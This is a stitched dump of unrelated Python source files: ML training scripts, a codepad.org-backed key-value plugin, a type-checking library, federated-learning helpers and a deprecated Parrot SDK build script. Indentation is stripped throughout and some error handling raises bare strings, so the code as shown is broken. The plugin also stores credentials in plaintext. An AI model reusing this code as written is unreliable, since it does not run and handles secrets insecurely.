parser.add_argument('--optim_weight_decay', type=float, default=0.00001)
# params of ZoneOut
parser.add_argument('--c_ratio', type=float, default=0.0)
parser.add_argument('--h_ratio', type=float, default=0.0)
# params of Scheduled Sampling (SS)
parser.add_argument('--ss_prob', type=float, default=0.0)
parser.add_argument('--ss_start', type=int, default=-1)
parser.add_argument('--ss_increase_every', type=int, default=5)
parser.add_argument('--ss_increase_prob', type=float, default=0.05)
parser.add_argument('--ss_max_prob', type=float, default=0.25)
# params of ReviewNet
parser.add_argument('--n_reviewers', type=int, default=8)
parser.add_argument('--input_encoding_size', type=int, default=512)
parser.add_argument('--lstm_size', type=int, default=512)
parser.add_argument('--lstm_step', type=int, default=30)
parser.add_argument('--seq_length', type=int, default=30)
parser.add_argument('--vocab_size', type=int, default=10516)
parser.add_argument('--word_embed_size', type=int, default=512)
parser.add_argument('--conv_feat_size', type=int, default=1536)
parser.add_argument('--conv_att_size', type=int, default=64)
parser.add_argument('--fc_feat_size', type=int, default=1536)
parser.add_argument('--att_hidden_size', type=int, default=512)
parser.add_argument('--top_word_count', type=int, default=1000)
parser.add_argument('--feature_type', type=str, default='inception_v4')
# conv features and fc features, default is inception-v4
parser.add_argument('--conv_feat_path', type=str, default='data/feats/mscoco_feats_v4_conv')
parser.add_argument('--fc_feat_path', type=str, default='data/feats/mscoco_feats_v4_fc')
args = parser.parse_args()
if args.feature_type == 'inception_v3':
args.conv_feat_path = 'data/feats/train_val_test_feats_v3_conv'
args.fc_feat_path = 'data/feats/train_val_test_feats_v3_fc'
args.conv_feat_size = 1280
args.conv_att_size = 64
args.fc_feat_size = 2048
elif args.feature_type == 'inception_v4':
args.conv_feat_path = 'data/feats/mscoco_feats_v4_conv'
args.fc_feat_path = 'data/feats/mscoco_feats_v4_fc'
args.conv_feat_size = 1536
args.conv_att_size = 64
args.fc_feat_size = 1536
elif args.feature_type == 'densenet':
args.input_fc_dir = 'data/feats/train_val_test_feats_densenet161_conv'
args.input_att_dir = 'data/feats/train_val_test_feats_densenet161_conv'
args.conv_feat_size = 2208
args.conv_att_size = 49
args.fc_feat_size = 2208
return args
if __name__ == '__main__':
opt = parse_opt()
opt_dict = vars(opt)
for k, v in opt_dict.items():
print(k + ': \t' + str(v))
```
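A quick way to see how `parse_opt` rewrites the feature paths and dimensions for a given `--feature_type` (a usage sketch, assuming this `opts.py` is importable from the working directory):

```python
import sys
import opts  # the file above

sys.argv = ['opts.py', '--feature_type', 'inception_v3']
opt = opts.parse_opt()
print(opt.fc_feat_size, opt.conv_feat_size)  # 2048 1280, per the overrides above
```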
#### File: ARNet/permuted_sequential_mnist/tf_permuted_mnist_lstm_rcst.py
```python
import os
import opts
import ipdb
import time
import random
import numpy as np
from six.moves import cPickle
import keras
from keras.datasets import mnist
import tensorflow as tf
class LSTM():
def __init__(self, opt):
self.lstm_step = opt.lstm_step
self.batch_size = opt.batch_size
self.lstm_size = opt.lstm_size
self.lstm = tf.contrib.rnn.BasicLSTMCell(self.lstm_size, state_is_tuple=True)
self.logit_W = tf.Variable(tf.random_uniform([self.lstm_size, 10], -0.08, 0.08), name='logit_W')
self.logit_b = tf.Variable(tf.zeros([10]), name='logit_b')
# ARNet
self.rcst_weight = opt.rcst_weight
self.lstm_rcst = tf.contrib.rnn.BasicLSTMCell(self.lstm_size, state_is_tuple=True)
self.linear_rcst_W = tf.Variable(tf.random_uniform([self.lstm_size, self.lstm_size], -0.08, 0.08), name='linear_rcst_W')
self.linear_rcst_b = tf.Variable(tf.zeros([self.lstm_size]), name='linear_rcst_b')
def build_model(self):
pixels = tf.placeholder(tf.float32, [self.batch_size, self.lstm_step, 1])
onehot_labels = tf.placeholder(tf.int32, [self.batch_size, 10])
state = self.lstm.zero_state(batch_size=self.batch_size, dtype=tf.float32)
state_rcst = self.lstm.zero_state(batch_size=self.batch_size, dtype=tf.float32)
prev_h = state[1]
rcst_loss = 0.0
for i in range(0, self.lstm_step):
with tf.variable_scope("LSTM"):
if i > 0:
tf.get_variable_scope().reuse_variables()
output, state = self.lstm(pixels[:, i], state)
if i == self.lstm_step - 1:
logit_outputs = tf.matmul(output, self.logit_W) + self.logit_b
cross_entropy = tf.nn.softmax_cross_entropy_with_logits(labels=onehot_labels, logits=logit_outputs)
loss = tf.reduce_sum(cross_entropy) / self.batch_size
with tf.variable_scope("rcst"):
if i > 0:
tf.get_variable_scope().reuse_variables()
output_rcst, state_rcst = self.lstm_rcst(output, state_rcst)
output_rcst_proj = tf.matmul(output_rcst, self.linear_rcst_W) + self.linear_rcst_b
current_rcst_loss = tf.reduce_sum(tf.square((output_rcst_proj - prev_h))) * self.rcst_weight
current_rcst_loss /= self.batch_size
rcst_loss += current_rcst_loss
return loss, rcst_loss, logit_outputs, pixels, onehot_labels
def train(opt, x_train, y_train, x_test, y_test):
tf.set_random_seed(opt.seed)
model = LSTM(opt)
tf_loss, tf_rcst_loss, tf_logit_outputs, tf_pixels, tf_onehot_labels = model.build_model()
config = tf.ConfigProto()
config.gpu_options.allow_growth = True
sess = tf.InteractiveSession(config=config)
# restore from the pre-trained model
saver = tf.train.Saver(max_to_keep=opt.max_epochs, write_version=1)
saver.restore(sess, opt.rcst_model_base_path)
tf_learning_rate = tf.placeholder(tf.float32)
with tf.variable_scope(tf.get_variable_scope(), reuse=False):
train_op = tf.train.AdamOptimizer(tf_learning_rate).minimize(tf_loss)
uninitialized_vars = []
for var in tf.global_variables():
try:
sess.run(var)
except tf.errors.FailedPreconditionError:
uninitialized_vars.append(var)
if len(uninitialized_vars):
init_new_vars_op = tf.variables_initializer(uninitialized_vars)
sess.run(init_new_vars_op)
iter_cnt = 0
for epoch in range(0, opt.max_epochs):
if epoch == 0:
current_learning_rate = opt.learning_rate
elif epoch != 0 and epoch % opt.learning_rate_decay_every == 0:
current_learning_rate = current_learning_rate * opt.learning_rate_decay_rate
# training
for start, end in zip(range(0, x_train.shape[0], opt.batch_size),
range(opt.batch_size, x_train.shape[0], opt.batch_size)):
start_time = time.time()
current_batch_pixels_train = x_train[start:end]
current_batch_labels_train = y_train[start:end]
feed_dict = {tf_learning_rate: current_learning_rate,
tf_pixels: current_batch_pixels_train,
tf_onehot_labels: current_batch_labels_train}
_, loss_val, rcst_loss_val, logit_outputs = sess.run([train_op, tf_loss, tf_rcst_loss, tf_logit_outputs], feed_dict)
# compute training accuracy
pred_y = np.argmax(logit_outputs, axis=1)
true_y = np.argmax(current_batch_labels_train, axis=1)
current_acc = sum(pred_y == true_y) / float(opt.batch_size)
iter_cnt += 1
end_time = time.time()
print("iter {:4d} epoch {:3d} lr {:.5f} loss {:.4f} rcst_loss {:.4f} train_acc {:.4f} time batch {:.4f}".format(iter_cnt,
epoch, current_learning_rate, loss_val, rcst_loss_val, current_acc, end_time-start_time))
# validation
if np.mod(epoch, 1) == 0:
print("epoch {} is done, saving the model ...".format(epoch))
saver.save(sess, os.path.join(opt.rcst_model_save_path, 'model_epoch'), global_step=epoch)
true_cnt = 0
test_batch_cnt = 0
for start, end in zip(range(0, x_test.shape[0], opt.batch_size),
range(opt.batch_size, x_test.shape[0], opt.batch_size)):
current_batch_pixels_test = x_test[start:end]
current_batch_labels_test = y_test[start:end]
feed_dict = {tf_learning_rate: current_learning_rate,
tf_pixels: current_batch_pixels_test,
tf_onehot_labels: current_batch_labels_test}
loss_test, logit_outputs = sess.run([tf_loss, tf_logit_outputs], feed_dict)
# compute test accuracy
pred_y = np.argmax(logit_outputs, axis=1)
true_y = np.argmax(current_batch_labels_test, axis=1)
true_cnt += sum(pred_y == true_y)
test_batch_cnt += 1
test_acc = true_cnt / float(test_batch_cnt * opt.batch_size)
print("epoch {} test_acc {:.4f} test_num: {}".format(epoch, test_acc, test_batch_cnt * opt.batch_size))
if __name__ == '__main__':
opt = opts.parse_opt()
opt_dict = vars(opt)
for k, v in opt_dict.items():
print(k + ': \t' + str(v))
with open('permuted_mnist_110.pkl', 'rb') as f:
permuted_mnist = cPickle.load(f)
if os.path.isdir(opt.rcst_model_save_path) is False:
os.mkdir(opt.rcst_model_save_path)
x_train_permuted = permuted_mnist['x_train_permuted']
y_train = permuted_mnist['y_train']
x_test_permuted = permuted_mnist['x_test_permuted']
y_test = permuted_mnist['y_test']
# training
train(opt, x_train_permuted, y_train, x_test_permuted, y_test)
```
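The script above expects a pre-built `permuted_mnist_110.pkl` with keys `x_train_permuted`, `y_train`, `x_test_permuted` and `y_test`. A hedged sketch of how such a file could be produced with the Keras MNIST loader that is already imported above; the seed 110 and the exact preprocessing are assumptions, not taken from this repo:

```python
import numpy as np
from six.moves import cPickle
from keras.datasets import mnist
from keras.utils import to_categorical

(x_train, y_train), (x_test, y_test) = mnist.load_data()
perm = np.random.RandomState(110).permutation(28 * 28)   # assumed fixed pixel permutation

def prep(x):
    x = x.reshape(-1, 28 * 28).astype(np.float32) / 255.0
    return x[:, perm].reshape(-1, 28 * 28, 1)             # [N, lstm_step, 1]

permuted = {'x_train_permuted': prep(x_train), 'y_train': to_categorical(y_train, 10),
            'x_test_permuted': prep(x_test),   'y_test': to_categorical(y_test, 10)}
with open('permuted_mnist_110.pkl', 'wb') as f:
    cPickle.dump(permuted, f)
```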
{
"source": "201528015329004/pyhacker",
"score": 3
}
#### File: my_plugins/kvdb/openkvCore.py
```python
import base64
import urllib2
import datetime
class OpenKVCore:
def postComment(self, session, content, comment_url):
comment_data = {'parent': "", 'text': content, 'submit': "Post Comment"}
r = session.post(comment_url, data=comment_data)
if r.ok:
s = r.url
if s.find("comment") == -1:
raise ("failed to upload")
return False
else:
return True
raise ("server error")
return False
def getHtml(self, session, webbase_id):
info_url = 'http://codepad.org/' + webbase_id
r = session.get(info_url)
if r.ok:
return r.text
raise ("server error")
def filteredContent(self, record, username, password, key):
items = record.split('#SEP#')
time, user, pwd, key, value = tuple(items)
if user == username.strip() and pwd == password.strip():
return key, base64.b64decode(value), time
return None
def login(self, root, pwd, session):
login_url = 'http://codepad.org/login'
login_data = {'username': root, 'password': pwd, 'submit': 'Login'}
r = session.post(login_url, data=login_data)
if r.ok:
ret = r.text
if ret.find("logout") == -1:
raise ("failed to init")
return False
return True
else:
print ("server error")
return False
def fastVerify(self, record, username, password, key=None):
if key is None:
s = '#SEP#' + username + '#SEP#' + password + '#SEP#'
else:
s = '#SEP#' + username + '#SEP#' + password + '#SEP#' + key + '#SEP#'
return record.find(s) >= 0
def getOnlineUTCTime(self):
webpage = urllib2.urlopen("http://just-the-time.appspot.com/")
internettime = webpage.read()
OnlineUTCTime = datetime.datetime.strptime(internettime.strip(), '%Y-%m-%d %H:%M:%S')
return OnlineUTCTime
```
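The record format parsed by `filteredContent` and `fastVerify` is a `#SEP#`-joined tuple of `(time, user, password, key, base64(value))`. A self-contained sketch under Python 2 (the module imports `urllib2`), with made-up names and values:

```python
import base64

record = '#SEP#'.join(['2016-01-01 00:00:00', 'alice', 'secret', 'token',
                       base64.b64encode('hello')])

core = OpenKVCore()
print(core.fastVerify(record, 'alice', 'secret'))               # True
print(core.filteredContent(record, 'alice', 'secret', 'token'))
# ('token', 'hello', '2016-01-01 00:00:00')
```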
#### File: pyhacker/utils/package_manage.py
```python
def install_and_import(package):
import importlib
try:
importlib.import_module(package)
except ImportError:
import pip
pip.main(['install', package])
finally:
globals()[package] = importlib.import_module(package)
```
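A usage sketch: after the call, the imported module is bound as a global in the module that defines `install_and_import` (note that `pip.main` was removed in pip 10+, so on recent pip the fallback would need `python -m pip` via `subprocess` instead):

```python
install_and_import('requests')   # pip-installs requests if missing, then imports it
print(requests.__version__)      # 'requests' is now a module-level name here
```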
{
"source": "201528015329004/TyPy",
"score": 2
}
#### File: TyPy/typy/typy.py
```python
class TypeBase(object):
__static_types__ = {}
def __init__(self):
original_members = ['__static_types__', '__class__', '__delattr__', '__dict__', '__doc__', '__format__', '__getattribute__', '__hash__', '__init__', '__module__', '__new__', '__reduce__', '__reduce_ex__', '__repr__', '__setattr__', '__sizeof__', '__str__', '__subclasshook__', '__used_keys__', '__weakref__','submit', 'get_members']
user_defined_members = set(dir(self)) - set(original_members)
functions,variables= [],[]
for name in user_defined_members:
if callable(getattr(self,name)):
functions.append(name)
else:
variables.append(name)
#print 'func',functions
#print 'var',variables
def __setattr__(self,attr,value):
t_value = TypeVar(type(value),value)
if hasattr (self,attr):
# need to check the type
# value is of TypeVar
prestored = getattr(self,attr)
if type(prestored) == TypeVar:
# if the attr is an attr defined by self.attr
if type(value) == TypeVar:
if prestored.t_raw == value.t_raw:
super(TypeBase,self).__setattr__(attr,t_value)
return
else:
print "value.t == prestored.t:",value.t_raw,prestored.t_raw,prestored.t_raw == value.t_raw
raise TypeError("{} should be of type {}, but got {}".format(str(attr), prestored.t, value.t))
# value is not of TypeVar
elif type(value) == prestored.t_raw:
super(TypeBase,self).__setattr__(attr,t_value)
return
else:
raise TypeError("{} should be of type {}, but got {}".format(str(attr), prestored.t, type(value)))
else:
if attr in dir(self):
# this attr is a class attr, I will just keep it as it is
TypeBase.__static_types__[attr] = type(prestored)
if type(value) == TypeVar:
if value.t_raw == TypeBase.__static_types__[attr]:
super(TypeBase,self).__setattr__(attr,value)
return
else:
raise TypeError("{} should be of type {}, but got {}".format(str(attr), TypeBase.__static_types__[attr], value.t_raw))
elif type(value) == TypeBase.__static_types__[attr]:
super(TypeBase,self).__setattr__(attr,value)
return
else:
raise TypeError("{} should be of type {}, but got {}".format(str(attr), TypeBase.__static_types__[attr], type(value)))
else:
raise TypeError("{} is not defined in instances of {}".format(str(attr), self.__class__))
else:
super(TypeBase,self).__setattr__(attr,t_value)
class TypeVar(object):
def __init__(self,objType,value=None):
if type(objType) != type and type(objType) != TypeDef:
raise TypeError("the 1st parameter should be of 'type' type")
if value is not None:
if type(value) != objType:
raise TypeError("expected the type of 'value' to be {}, got {}".format(objType,type(value)))
self.__objType__ = objType if type(objType) == TypeDef else TypeDef(objType)
self.__objValue__ = value
def __getattr__(self,name):
if hasattr(super(TypeVar,self),name):
return getattr(super(TypeVar,self),name)
elif hasattr(self.__objValue__,name):
return getattr(self.__objValue__,name)
def __dir__(self):
dir_list = dir(super(TypeVar,self))
dir_list.extend(dir(self.__objValue__))
return dir_list
@staticmethod
def var(value):
return TypeVar.__create__(type(value),value)
@staticmethod
def __create__(objType,value=None):
instance = TypeVar(objType,value)
return instance
def _consistent_type(self,obj):
if type(obj) != TypeDef:
return self.t_raw == type(obj)
return self.t_raw == obj.t_raw
def _is_value_and_type_consistent(self):
if type(self.__objType__) == type:
return self.__objType__ == type(self.__objValue__)
if type(self.__objType__) == TypeDef:
return self.__objType__.t_raw == type(self.__objValue__)
def _is_computable(self,raw_type):
number_types = [int,float,long,complex]
if self.t_raw in number_types and raw_type in number_types:
return True
else:
return False
def __get_type_and_value(self,other):
if type(other) == TypeDef:
raw_type = other.t_raw
raw_value = other.v
else:
raw_type = type(other)
raw_value = other
return raw_type,raw_value
def assign(self,value):
if value == None:
self.v = None
return
if type(value) == TypeVar:
if self.t == value.t:
self.__objValue__ = value.v
return
else:
raise TypeError("Assignment failed. expecting {}, got {}".format(self.t,value.t))
if self.t_raw == type(value):
self.__objValue__ = value
else:
raise TypeError("Assignment failed. expecting {}, got {}".format(self.t_raw,type(value)))
def __operation_value__(self,value):
if type(value) != TypeVar:
ret = TypeVar.__create__(type(value),value)
return ret
else:
return value
def __add__(self,other):
raw_type,raw_value = self.__get_type_and_value(other)
if hasattr(raw_value,'v'):
value = self.v + raw_value.v
else:
value = self.v + raw_value
return self.__operation_value__(value)
def __sub__(self,other):
raw_type,raw_value = self.__get_type_and_value(other)
if hasattr(raw_value,'v'):
value = self.v - raw_value.v
else:
value = self.v - raw_value
return self.__operation_value__(value)
def __mul__(self,other):
raw_type,raw_value = self.__get_type_and_value(other)
if hasattr(raw_value,'v'):
value = self.v * raw_value.v
else:
value = self.v * raw_value
return self.__operation_value__(value)
def __pow__(self,other):
raw_type,raw_value = self.__get_type_and_value(other)
print "raw_type,raw_value",raw_type,raw_value
if hasattr(raw_value,'v'):
value = self.v ** raw_value.v
else:
value = self.v ** raw_value
return self.__operation_value__(value)
def __truediv__(self,other):
raw_type,raw_value = self.__get_type_and_value(other)
if hasattr(raw_value,'v'):
value = self.v / raw_value.v
else:
value = self.v / raw_value
return self.__operation_value__(value)
def __floordiv__(self,other):
raw_type,raw_value = self.__get_type_and_value(other)
if hasattr(raw_value,'v'):
value = self.v // raw_value.v
else:
value = self.v // raw_value
return self.__operation_value__(value)
def __mod__(self,other):
raw_type,raw_value = self.__get_type_and_value(other)
if hasattr(raw_value,'v'):
value = self.v % raw_value.v
else:
value = self.v % raw_value
return self.__operation_value__(value)
def __lshift__(self,other):
raw_type,raw_value = self.__get_type_and_value(other)
if hasattr(raw_value,'v'):
value = self.v << raw_value.v
else:
value = self.v << raw_value
return self.__operation_value__(value)
def __rshift__(self,other):
raw_type,raw_value = self.__get_type_and_value(other)
if hasattr(raw_value,'v'):
value = self.v >> raw_value.v
else:
value = self.v >> raw_value
return self.__operation_value__(value)
def __and__(self,other):
raw_type,raw_value = self.__get_type_and_value(other)
if hasattr(raw_value,'v'):
value = self.v & raw_value.v
else:
value = self.v & raw_value
return self.__operation_value__(value)
def __or__(self,other):
raw_type,raw_value = self.__get_type_and_value(other)
if hasattr(raw_value,'v'):
value = self.v | raw_value.v
else:
value = self.v | raw_value
return self.__operation_value__(value)
def __eq__(self, other):
raw_type,raw_value = self.__get_type_and_value(other)
if hasattr(raw_value,'v'):
value = self.v == raw_value.v
else:
value = self.v == raw_value
return self.__operation_value__(value)
def __ne__(self, other):
raw_type,raw_value = self.__get_type_and_value(other)
if hasattr(raw_value,'v'):
value = self.v != raw_value.v
else:
value = self.v != raw_value
return self.__operation_value__(value)
def __xor__(self,other):
raw_type,raw_value = self.__get_type_and_value(other)
if hasattr(raw_value,'v'):
value = self.v ^ raw_value.v
else:
value = self.v ^ raw_value
return self.__operation_value__(value)
def __lt__(self,other):
raw_type,raw_value = self.__get_type_and_value(other)
if hasattr(raw_value,'v'):
value = self.v < raw_value.v
else:
value = self.v < raw_value
return self.__operation_value__(value)
def __gt__(self,other):
raw_type,raw_value = self.__get_type_and_value(other)
if hasattr(raw_value,'v'):
value = self.v > raw_value.v
else:
value = self.v > raw_value
return self.__operation_value__(value)
def __ge__(self,other):
raw_type,raw_value = self.__get_type_and_value(other)
if hasattr(raw_value,'v'):
value = self.v >= raw_value.v
else:
value = self.v >= raw_value
return self.__operation_value__(value)
def __le__(self,other):
raw_type,raw_value = self.__get_type_and_value(other)
if hasattr(raw_value,'v'):
value = self.v <= raw_value.v
else:
value = self.v <= raw_value
return self.__operation_value__(value)
def __invert__(self):
value = ~self.v
return self.__operation_value__(value)
def __str__(self):
return str(self.__objValue__)
def __repr__(self):
return self.__str__()
@property
def v(self):
return self.__objValue__
@property
def t(self):
return self.__objType__
@property
def t_raw(self):
return self.__objType__.t
def __type__(self):
return str(self.t)
class TypeDef(object):
def __init__(self,objType):
if type(objType) == type:
self.__objType__ = objType
else:
raise TypeError("the 1st parameter should be of 'type' type")
def __str__(self):
return str(self.__objType__)
def __repr__(self):
return "Type wrapper for " + repr(self.__objType__)
@property
def t(self):
return self.__objType__
```
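A short usage sketch for `TypeVar` under Python 2 (the module uses `print` statements and `long`); the values are arbitrary:

```python
x = TypeVar(int, 3)          # a typed wrapper holding an int
y = x + 4                    # arithmetic unwraps .v and re-wraps the result
print y.v, y.t_raw           # 7 <type 'int'>
x.assign(10)                 # OK: same type
try:
    x.assign('ten')
except TypeError as e:
    print e                  # Assignment failed. expecting <type 'int'>, got <type 'str'>
```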
{
"source": "20155104009/GMSNet",
"score": 2
}
#### File: GMSNet/model/template.py
```python
import math
import numpy as np
import torch
import torch.nn as nn
import torch.nn.functional as F
class Network(nn.Module):
def __init__(self):
super(Network, self).__init__()
def forward(self, x):
return x
```
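The template network above is just an identity placeholder; a minimal smoke test with an arbitrary input shape:

```python
net = Network()
x = torch.randn(1, 3, 32, 32)
print(net(x).shape)   # torch.Size([1, 3, 32, 32]) -- forward returns its input unchanged
```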
{
"source": "2016312357/FL-shield",
"score": 2
}
#### File: 2016312357/FL-shield/1.py
```python
import random
import numpy as np
a=np.mean([1,3,5,6,7,8])
print(a)
import scipy.sparse as sp
import collections
def load_client_train_date(): # for FL train
filename = "./Data/train_data"
num_users = 0
num_items = 0
with open(filename, "r") as f:
line = f.readline()
while line is not None and line != "":
arr = line.split("\t")
u, i = int(arr[0]), int(arr[1])
num_users = max(num_users, u)
num_items = max(num_items, i)
line = f.readline()
num_items += 1
num_users += 1
print(num_users,num_items)
mat = sp.dok_matrix((num_users, num_items), dtype=np.float32)
with open(filename, "r") as f:
line = f.readline()
while line is not None and line != "":
arr = line.split("\t")
user, item, rating = int(arr[0]), int(arr[1]), float(arr[2])
# print("usr:{} item:{} score:{}".format(user,item,rating))
if rating > 0:
mat[user, item] = 1.0
line = f.readline()
#client_datas = [[[], [], []] for i in range(num_users)]  # (user, item, rating) triples
with open('./Data/test_negative','a+') as w, open('./Data/test_data','r') as r:
line = r.readline()
while line is not None and line != "":
arr = line.split("\t")
user, item = int(arr[0]), int(arr[1])
w.write('('+str(user)+','+str(item)+')')
line = r.readline()
for t in range(99):  # randomly pick an unwatched movie as a negative sample
nega_item = np.random.randint(num_items)
while nega_item==item or (user, nega_item) in mat.keys():
nega_item = np.random.randint(num_items)
w.write('\t'+str(nega_item))
w.write('\n')
print('done')
#load_client_train_date()
```
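The negative-sampling step above draws, for each test pair, 99 item ids the user has never interacted with, by rejection sampling against the `dok_matrix`. A self-contained sketch on a toy interaction matrix (4 negatives instead of 99):

```python
import numpy as np
import scipy.sparse as sp

num_users, num_items = 3, 10
mat = sp.dok_matrix((num_users, num_items), dtype=np.float32)
mat[0, 2] = 1.0          # user 0 has interacted with items 2 and 5
mat[0, 5] = 1.0

user, item = 0, 2        # a (user, positive item) test pair
negatives = []
for _ in range(4):       # 99 in the script above
    nega_item = np.random.randint(num_items)
    while nega_item == item or (user, nega_item) in mat.keys():
        nega_item = np.random.randint(num_items)
    negatives.append(nega_item)
print(negatives)         # e.g. [7, 3, 9, 1] -- never 2 or 5
```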
#### File: 2016312357/FL-shield/Noise_add.py
```python
import numpy as np
import copy
# import torch
import random
# from Calculate import get_1_norm#, get_2_norm, inner_product, avg_grads
def noise_add(noise_scale, w):
w_noise = copy.deepcopy(w)
if isinstance(w[0], np.ndarray) == True:
noise = np.random.normal(0, noise_scale, w.size())
w_noise = w_noise + noise
else:
for k in range(len(w)):
for i in w[k].keys():
noise = np.random.normal(0, noise_scale, w[k][i].size())
'''if args.gpu != -1:
noise = torch.from_numpy(noise).float().cuda()
else:
noise = torch.from_numpy(noise).float()'''
w_noise[k][i] = w_noise[k][i] + noise
return w_noise
def users_sampling(args, w, chosenUsers):
if args.num_chosenUsers < args.num_users:
w_locals = []
for i in range(len(chosenUsers)):
w_locals.append(w[chosenUsers[i]])
else:
w_locals = copy.deepcopy(w)
return w_locals
'''def clipping(args, w):
if get_1_norm(w) > args.clipthr:
w_local = copy.deepcopy(w)
for i in w.keys():
w_local[i]=copy.deepcopy(w[i]*args.clipthr/get_1_norm(w))
else:
w_local = copy.deepcopy(w)
return w_local'''
```
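A small sketch of `users_sampling`, which simply gathers the weight entries of the chosen clients; toy placeholder weights and an `argparse.Namespace` stand in for the real `args` and model weights:

```python
from argparse import Namespace

args = Namespace(num_chosenUsers=2, num_users=4)
w = ['w0', 'w1', 'w2', 'w3']             # placeholder per-client weights
chosen = [3, 1]
print(users_sampling(args, w, chosen))   # ['w3', 'w1']
```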
{
"source": "2016-Capstone/PythonController",
"score": 2
}
#### File: arsdk-xml/ARSDKBuildUtils/SDK3Build.py
```python
import os
import sys
import subprocess
import shutil
try:
import argcomplete
hasArgComplete = True
except ImportError:
hasArgComplete = False
MYDIR=os.path.abspath(os.path.dirname(sys.argv[0]))
if '' == MYDIR:
MYDIR=os.getcwd()
sys.path.append('%(MYDIR)s/Utils/Python' % locals())
#Custom imports
from xml.dom.minidom import parseString
from ARFuncs import *
from time import localtime, strftime
from Common_GitUtils import *
import commandLine
import xmlreader
import time
#This is a message to announce the new build system
ARPrint ('\n\nThis script is deprecated and doesn\'t work anymore.\n')
ARPrint ('Please download repo (http://source.android.com/source/downloading.html#installing-repo).')
ARPrint ('Then run \'repo init -u https://github.com/Parrot-Developers/arsdk_manifests.git\' in an empty folder.')
ARPrint ('Then run \'repo sync\' to get all sources.')
ARPrint ('After that, you\'ll be able to run \'./build.sh\' to build the SDK.')
ARPrint ('\n\nYou can find a full documentation here: http://developer.parrot.com/docs/bebop/#go-deeper\n\n')
exit(0)
# After that comment, this is the old build. Left here in memory of the old time we spent building the SDK with it. RIP
start = time.time()
DEBUG_MODE = False
#
# Init the log file
#
ARInitLogFile()
#
# Get extra xml dirs
#
xmlDirs = [ MYDIR ]
try:
extraXmlDirs = os.environ['ARSDK_EXTRA_XML_DIRS'].split(':')
xmlDirs.extend(extraXmlDirs)
xmlDirs.remove('')
except:
pass
#
# Parse XML
#
(repos, targets, prebuilts, libraries, binaries) = xmlreader.parseAll(xmlDirs)
if DEBUG_MODE:
ARPrint ('Debug mode enabled : dump XML contents')
repos.dump()
targets.dump()
prebuilts.dump()
libraries.dump()
binaries.dump()
EXIT(0)
#
# Parse command line args
#
parser = commandLine.CommandLineParser(targets, libraries, binaries)
if hasArgComplete:
argcomplete.autocomplete(parser.parser)
parser.parse(sys.argv)
#
# Dump command line args into log file
#
parser.dump()
#
# Export useful tools if available
# (e.g. colormake)
#
ARMakeArgs = '-j ' + str(parser.threads)
ARSetEnvIfExists('ARMAKE', 'colormake', 'make', args=ARMakeArgs)
# Import targets functions for library/binary/doc
# This block will try to import the functions for all targets declared in targets.xml file
# Adding a new target requires the following modifications :
# 1> Add the target in targets.xml file
# 2> Adapt libraries.xml / binaries.xml to support this target
# 3> Create the Target_BuildLibrary.py script in Utils/Python dir
# -> This file must contain a Target_BuildLibrary(target, lib, clean=False, debug=False) function
# 4> (Optional) Create the Target_BuildBinary.py script in Utils/Python dir
# -> This file must contain a Target_BuildBinary(target, bin, clean=False, debug=False) function
# 5> (Optional) Create the Target_GenLibraryDoc.py script in Utils/Python dir
# -> This file must contain a Target_GenLibraryDoc(target, lib, clean=False) function
BUILD_LIB_FUNCS = {}
BUILD_BIN_FUNCS = {}
GEN_DOC_FUNCS = {}
for t in targets.list:
try:
_name = t.name + '_BuildLibrary'
_module = __import__ (_name)
BUILD_LIB_FUNCS[t.name] = getattr (_module, _name)
except ImportError:
pass
try:
_name = t.name + '_BuildBinary'
_module = __import__ (_name)
BUILD_BIN_FUNCS[t.name] = getattr (_module, _name)
except ImportError:
pass
try:
_name = t.name + '_GenLibraryDoc'
_module = __import__ (_name)
GEN_DOC_FUNCS[t.name] = getattr (_module, _name)
except ImportError:
pass
#
# Do force clean if needed
#
if parser.isForceClean:
ARLog("Force clean !")
TARGETDIR = '%(MYDIR)s/Targets' % locals()
ARDeleteIfExists (TARGETDIR)
# Do all-cleanup if needed
if parser.isForceCleanup:
allRepoDirs=[]
for repo in repos.list:
if not repo.ext:
allRepoDirs.append(repo.getDir())
cleanScript = '%(MYDIR)s/Utils/cleanupSDKRepo.bash' % locals()
ARExecute(cleanScript + ' ' + ARListAsBashArg(allRepoDirs))
exit(0)
#
# Do all repo work:
# - Clone non existant repositories
# - Checkout the requested branch/tag/commit
# - If on a branch, pull it
#
if not parser.noGit:
checkAllReposUpToDate(repos, MYDIR, parser.repoBaseUrl, parser.defaultBaseRepoUrl, extraScripts=parser.extraGitScripts)
else:
ARLog('Skipping git checks')
if parser.doNothing:
ARLog('Nothing to be done')
exit(0)
# Android case --> Force minimum api level and target api level
ARSetEnv('AR_ANDROID_MIN_VERSION', '14')
ARSetEnv('AR_ANDROID_API_VERSION', '19')
#
# Actual build loop
#
allOk = True
for target in parser.activeTargets:
libraries.clearCache()
binaries.clearCache()
if parser.activeLibs:
if target.name in BUILD_LIB_FUNCS:
for lib in parser.activeLibs:
if not BUILD_LIB_FUNCS[target.name](target, lib, clean=parser.isClean, debug=parser.isDebug, nodeps=parser.noDeps, inhouse=parser.isInHouse, requestedArchs=parser.archs, isMp=parser.multiProcess):
allOk = False
else:
ARLog('Unable to build libraries for target %(target)s' % locals())
if parser.genDoc and not parser.isClean:
if target.name in GEN_DOC_FUNCS:
for lib in parser.activeLibs:
GEN_DOC_FUNCS[target.name](target, lib)
TargetDocIndexScript = ARPathFromHere('Utils/generateDocIndex.bash')
TargetDocIndexPath = ARPathFromHere('Targets/%(target)s/Build/Doc' % locals())
ARExecute('%(TargetDocIndexScript)s %(TargetDocIndexPath)s %(target)s' % locals())
else:
ARLog('Unable to generate documentation for target %(target)s' % locals())
if parser.activeBins:
if target.name in BUILD_BIN_FUNCS:
for bin in parser.activeBins:
if not BUILD_BIN_FUNCS[target.name](target, bin, clean=parser.isClean, debug=parser.isDebug, nodeps=parser.noDeps, inhouse=parser.isInHouse, requestedArchs=parser.archs):
target.failed = True
allOk = False
else:
ARLog('Unable to build binaries for target %(target)s' % locals())
for scrinfo in target.postbuildScripts:
scr = scrinfo['path']
if allOk:
if not ARExecute(scr + ' >/dev/null 2>&1', failOnError=False):
ARPrint('Error while running ' + scr + '. Run manually to see the output')
target.failed = True
scrinfo['done'] = False
allOk=False
else:
scrinfo['done'] = True
if not allOk:
break
if parser.installDoc and allOk:
DocCopyScript = ARPathFromHere('Utils/copyDoc.bash')
for target in parser.activeTargets:
ARExecute ('%(DocCopyScript)s %(target)s' % locals())
hasColors = ARExecute('tput colors >/dev/null 2>&1', failOnError=False, printErrorMessage=False)
if ARExistsInPath('stty'):
termSizeStr = ARExecuteGetStdout(['stty', 'size'], failOnError=False, printErrorMessage=False)
